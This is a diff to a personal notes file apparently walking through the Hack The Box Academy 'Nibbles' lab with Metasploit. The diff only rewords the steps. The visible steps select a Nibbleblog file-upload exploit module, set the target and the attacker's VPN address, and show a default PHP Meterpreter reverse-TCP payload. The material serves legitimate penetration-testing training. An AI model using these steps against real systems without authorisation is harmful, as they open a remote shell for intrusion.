secmancer/sec-notes-repo/Hack The Box/HTB Academy/Skill Paths/Cracking into HTB/Getting Started/Attacking your First Box/Nibbles - Alternate User Method - Metasploit.md

 Interact with a module by name or index.
 For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
 ```
-- We can then type `use 0` to load the selected exploit.
-Set the `rhosts` option as the target IP address and `lhosts` as the IP address of your `tun0` adapter (the one that comes with the VPN connection to HackTheBox).
+- We'll use exploit 0, so let's type in `use 0` to load the selected exploit.
+- Set the `rhosts` option as the target IP address and `lhosts` as the IP address of your `tun0` adapter, which comes with the VPN connection to HackTheBox.
 ```shell-session
 msf6 > use 0
 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp